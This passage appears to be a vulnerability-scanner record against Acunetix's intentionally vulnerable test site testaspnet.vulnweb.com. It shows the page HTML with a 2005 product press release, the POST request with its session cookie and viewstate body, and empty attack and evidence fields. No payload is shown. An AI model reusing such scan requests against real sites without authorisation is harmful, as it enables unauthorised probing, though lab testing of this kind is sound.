cgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9y